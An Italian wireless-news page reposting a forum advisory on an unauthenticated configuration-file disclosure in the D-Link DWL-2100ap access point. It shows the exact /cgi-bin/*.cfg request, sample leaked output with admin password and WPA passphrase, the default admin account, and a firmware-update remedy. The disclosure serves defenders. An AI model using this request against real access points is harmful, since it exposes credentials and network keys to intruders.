Home arrow Software per Wireless arrow D-Link DWL-2100ap Discloses Configuration File to Remote Users
Notizie flash
Molti siti hanno riportato in questi ultimi giorni la notizia del lancio negli Stati Uniti della nuova Sound Blaster Wireless Music System, il rivoluzionario dispositivo sonoro con interfaccia wireless 802.11 integrata. Grazie ai nostri contatti con Creative Labs Mediterranean vi possiamo anticipare che la versione europea di Sound Blaster Wireless, che prevede interfaccia multilingua (14 lingue), compatibilità con gli standard europei e nuove versioni di software e Firmware, è prevista per il primo trimestre del 2004. Ne riparleremo più approfonditamente nonappena avremo informazioni più precise.
 
Menu principale
Home
Forum sul Wireless
Iscrizione Newsletter
Rimozione Newsletter
Wireless nei Comuni
Contributi Audio sul W.
FAQ sul Wireless
Sicurezza Wireless
Guide sul Wireless
Recensioni Hardware
Web Links
Sperimentazioni
News Generiche
Wireless Business
Hardware Wireless
Software per Wireless
Eventi e Manifestazioni
Normativa Wireless
Computers e Wireless
Sistemi Bluetooth
Comunicazioni dal sito
Glossario sul Wireless
Dicono di Noi
Press Kit
Audio Guestbook
Add to: Mr. Wong Add to: Webnews Add to: Icio Add to: Oneview Add to: Yigg Add to: Linkarena Add to: Digg Add to: Del.icoi.us Add to: Reddit Add to: Simpy Add to: StumbleUpon Add to: Slashdot Add to: Netscape Add to: Furl Add to: Yahoo Add to: Blogmarks Add to: Diigo Add to: Technorati Add to: Newsvine Add to: Blinkbits Add to: Ma.Gnolia Add to: Smarking Add to: Netvouz Add to: Folkd Add to: Spurl Add to: Google Add to: Blinklist Information
Social Bookmarking
Podcast

D-Link DWL-2100ap Discloses Configuration File to Remote Users Stampa E-mail
Riportiamo un contenuto postato da "Ashanti" sul nostro Forum: la "Intruders Tiger Team Security" ha identificato, durante un progetto di intrusione (Pen-Test), una vulnerabilità sconosciuta nel D-Link DWL-2100ap, che permette ad utenti malintenzionati di leggere la configurazione dell'ap, senza il bisogno di autenticazione con utente e password tramite il web Server. Nel file di configurazione dell'Access Point sono contenute importanti informazioni, quali: Utente e password per controllare il dispositivo da remoto, le password che si usano nelle crittografie WEP e WPA. SSID, IP, subnet mask, filtri di MAC Address, ecc. E' consigliabile aggiornare al più presto il Firmware del dispositivo.

ANALISI DEL PROBLEMA:

Tramite una richiesta HTTP della cartella /cgi-bin/  il Web server ci darà l'errore 404 (Pagina non trovata).

Tramite una richiesta HTTP del file /cgi-bin/qualsiasinome.htm il Web server ci darà l'errore 404 (Pagina non trovata).

Invece, tramite una richiesta HTTP di un file nella cartella /cgi-bin/ con estenzione .cfg, ci restituirà l'intera configurazione dell'access point.
Ad esempio, con la richiesta del file "http://dlink-DWL-2100ap/cgi-bin/Intruders.cfg"

Avremo un risultato simile al seguente:

# Copyright (c) 2002 Atheros Communications, Inc., All Rights Reserved
# DO NOT EDIT -- This configuration file is automatically generated
magic Ar52xxAP
fwc: 34
login admin
DHCPServer
Eth_Acl
nameaddr
domainsuffix
IP_Addr 10.0.0.30
IP_Mask 255.0.0.0
Gateway_Addr 10.0.0.1
RADIUSaddr
RADIUSport 1812
RADIUSsecret
password IntrudersTest
passphrase
wlan1 passphrase AnewBadPassPhrase
# Altre linee secondarie sono state rimosse.

Il pieno controllo del dispositivo darebbe, ad utenti malintenzionati, pieno accesso all'intera WLAN.
Purtroppo il D-Link DWL-2100ap non permette la disabilitazione del Web server, e non ha opzioni per filtrarne la porta.

Ricordiamo, infine, che il D-Link DWL-2100ap è preconfigurato con l'utente: "Admin" e senza password.
Non sono state effettuate prove su altri Access Point D-Link, cui non se ne esclude la vulnerabilità.

RIMEDI:
Si consiglia l'aggiornamento del firmware del D-Link DWL-2100ap all'ultima versione, cui è stato corretto il Bug dal produttore.

QUI il collegamento diretto all'aggiornamento.
 
 
< Articolo Precedente   Prossimo Articolo >
[Indietro]



Visita anche www.savoldi.com